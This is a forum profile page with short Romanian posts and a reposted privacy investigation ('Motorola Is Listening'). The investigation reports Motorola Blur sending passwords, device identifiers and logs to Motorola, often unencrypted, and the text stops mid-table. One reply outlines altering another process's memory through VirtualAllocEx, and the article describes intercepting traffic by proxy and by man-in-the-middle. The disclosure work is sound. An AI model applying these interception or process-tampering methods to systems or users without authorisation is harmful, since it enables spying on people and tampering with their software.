-
Posts
18736 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
1. E un fel de kickstarter in care investitia e de 500 de $? 2. Din cei 500 de $ cati ii vor reveni programatorului? Sau munca omului nu este considerata "in cadrul proiectului"? 3. Cui revin drepturile de autor pentru proiectul respectiv daca acesta e castigator? 4. Dupa ce un proiect castiga, ce se intampla mai departe? Cum se dezvolta? Sunt doar cateva intrebari prin care vreau sa ma asigur ca totul e in regula.
-
Ar fi frumos un tutorial despre cum functioneaza, in detaliu.
- 11 replies
-
- criptografie
- photobear
-
(and 3 more)
Tagged with:
-
Da, se pot modifica datele. Cel mai practic e sa aloci memorie in procesul repsectiv (VirtualAllocEx) si sa pui in acel buffer datele modificate, iar la apelul functiei sa folosesti noile date (pointerul alocat de tine).
-
Motorola Is Listening article by Ben Lincoln In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) which I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was over an unencrypted HTTP channel. If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed. Technical notes The screenshots and other data in this article are more heavily-redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this: There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the data, it's hard for me to know if any of these values are actually sensitive at this time, or in the future when someone more thoroughly decodes the protocol. My employer reminds its employees that publicly identifying themselves as employees of that organization conveys certain responsibilities upon them. I do not speak for my employer, so all information that would indicate who that employer is has been removed. I would rather not expose my personal information more than Motorola has already. Discovery I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] ActiveSync Configuration Information [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] ActiveSync configuration information being sent to Motorola's Blur service. [/TD] [/TR] [/TABLE] As of 22 June, 2013, svcmot.com is a domain owned by Motorola, or more specifically: Motorola Trademark Holdings, LLC 600 North US Highway 45 Attn: Law Department Libertyville IL 60048 US internic@motorola.com +1.8475765000 Fax: +1.8475234348 I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data: The DNS name of the ActiveSync server (only sent when the configuration is first created). The domain name and user ID I specified for authentication. The full email address of the account. The name of the connection. As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s). Analysis - email, ActiveSync, and social networking I decided to try setting up each of the other account types that the system would allow me to, and find out what was captured. Facebook and Twitter For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (oAuth) explicitly intended to make this unnecessary, but Motorola does not use that more-secure mechanism. The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties. Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Facebook and Twitter data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by friend [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by self [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Silent Signon [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter following information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter post [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter posts are also read through Blur [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] You know your software is trustworthy and has nothing to hide when it has a function called "silent signon". [/TD] [/TR] [/TABLE] Photobucket and Picasa For both services, email address and password are sent to Motorola over HTTPS. For Photobucket, username and image URLs are sent over unencrypted HTTP. For Picasa, email address, display name, friend information, and image URLs are sent over unencrypted HTTP. During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS). I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket user ID and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa name and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Photo uploads (to Facebook, Photobucket, etc.) When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored. The full path of the original image on the device is also sent to Motorola. For example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Data sent to Motorola's Blur service when uploading photos [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Full local path [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EXIF data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Service username and tags [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Youtube Email address and password are sent to Motorola over HTTPS. Email address is also sent to Motorola over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Youtube data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Youtube password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Exchange ActiveSync Domain name, username, email address, and name of the connection are sent over unencrypted HTTP. When a new connection is created, the Exchange ActiveSync server's DNS name is also sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Exchange ActiveSync data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS initial setup [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] IMAP/POP3 email Email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] IMAP account data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] IMAP configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] One of the few screenshots I can leave some of the important details visible in - in this case, because the account in question is already on every spam list in the world. [/TD] [/TR] [/TABLE] Yahoo Mail Email address is sent over unencrypted HTTP. This type of account seems to be handled in at least sort of the correct way by Motorola's software, in that a request is made for an access token, and as far as I can tell, the actual account password is never sent to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Yahoo Mail address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Flickr Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Flickr [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Permission screen [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The Flickr integration behaves the way every other part of Motorola's Blur service should. [/TD] [/TR] [/TABLE] GMail/Google Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a Youtube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway. Also interestingly, while testing Picasa and/or Youtube integration, Motorola's methods of authenticating actually tripped Google's suspicious activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Google: on guard against suspicious vendors [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Suspicious activity detected [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Source of the suspicious activity confirmed [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Firefox sync No data seems to pass through Motorola's servers. News / RSS RSS feeds that are subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] RSS / News sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Other data Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Home screen configuration and other data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Home screen configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Universal account IDs [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone? [/TD] [/TR] [/TABLE] Analysis - "check-in" data As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data which was a binary upload, and I thought I'd see if it was in some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] GZip compressed-data header embedded in check-in data [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] What is contained in this data are essentially debug-level log entries from the device. The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it. Information that is definitely being collected The IMEI and IMSI of the phone. These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic. The phone number of the phone, and carrier information (e.g. Verizon). The barcode from inside the battery compartment. Applications included with the device as well as installed by the user. Statistics about how those applications are used (e.g. how much data each one has sent and received). Phone call and text message statistics. For example, how many calls have been received or missed. Bluetooth device pairing and unpairing, including detailed information about those devices. Email addresses/usernames for accounts configured on the device. Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device). Device-level event logs (these are sent to Google as well by a Google-developed checkin mechanism). Debugging/troubleshooting information about most activities the phone engages in. Signal strengths statistics and data use for each type of radio included in the device. For example, bytes sent/received via 3G versus wifi. Stack memory and register dumps related to applications which have crashed. For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server. Information that may be being collected The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specify that location information (e.g. GPS coordinates) may be collected (see Speaking of that privacy policy..., below). I have not seen this in the data I've intercepted. This may be due to it being represented in a non-obvious format, or it may only be collected under certain conditions, or it may only be collected by newer devices than my 2-year-old Droid X2. While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that for any accounts that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds" referenced by GUID/UUID-like values. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Check-in data being sent to Motorola [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Application use stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Basic hardware properties [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Bluetooth headset use-tracking [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Data use, SMS text, contact, and CPU stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Label in the battery compartment of my phone [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] BlurID, IMEI and barcode (from label), IMSI and phone number [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS setup information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS policy elements [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email and Disk Stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Event logs (these are also captured by Google) [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Image upload bug [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Logging of newly-installed applications [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Missed calls [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] I told you it was syncing every nine minutes! [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Possible client-side SQL injection vulnerability [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Radio and per-application stats (e.g. CPU use by app) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Register and stack memory dump [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 10, 31, 80 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 40, 70, 20, 2, 60, and 5 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] System panic auto-reboot [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The "sync app ID" information will become more important in the section about XMPP. The system panic messge has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem). [/TD] [/TR] [/TABLE] Analysis - Jabber / XMPP stream communication In some of the check-in logs, I saw entries that read e.g.: XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 XMPPConnectionManager I:onConfigurationUpdate: entered XMPPConnectionManager I:onConfigurationUpdate: exiting WSBase I:mother told us it's okay to retry the waiting requests: 0 NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222 TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first. The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them over? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (which often use IRC in this way) to me. Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol, and cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in the March of 2013. Mallory is a relatively new tool, and is somewhat finnicky to get set up, but I learned a lot doing so. Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle exploit and view the contents of the traffic. If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page. This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that: The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM. The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash, and then a sequence number. For example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4. As long as the channel is open, the phone will check in with Motorola every nine minutes. At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these trigger an HTTP post request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data. The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola. [TABLE=class: ContentTable] [TR] [TD=class: Header] ID [/TD] [TD=class: Header] Name [/TD] [TD=class: Header] Purpose [/TD] [TD=class: Header] Data Format [/TD] [TD=class: Header] Observed In Testing? [/TD] [/TR] [TR] [TD=class: Data] 2 [/TD] [TD=class: Data] BlurSettingsSyncHandler [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] JSON [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 5 [/TD] [TD=class: Data] BlurSetupSyncHandler [/TD] [TD=class: Data] Unverified - called when a new type of sync needs to be added? [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 10 [/TD] [TD=class: Data] BlurContactsSyncHandler [/TD] [TD=class: Data] Syncs contact information (e.g. Google account contacts) [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 20 [/TD] [TD=class: Data] SNMailSyncHandler [/TD] [TD=class: Data] Unverified - probably syncs private messages from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 31 [/TD] [TD=class: Data] StatusSyncHandler [/TD] [TD=class: Data] Syncs current status/most-recent-post information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 40 [/TD] [TD=class: Data] BlurSNFriendsSyncHandler [/TD] [TD=class: Data] Syncs friend information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 50 [/TD] [TD=class: Data] NewsRetrievalService [/TD] [TD=class: Data] Syncs news feeds set up in the built-in Motorola app [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 60 [/TD] [TD=class: Data] AdminFlunkySyncHandler [/TD] [TD=class: Data] Unverified - sounds like some sort of remote-support functionality [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 70 [/TD] [TD=class: Data] FeedReceiverService [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] 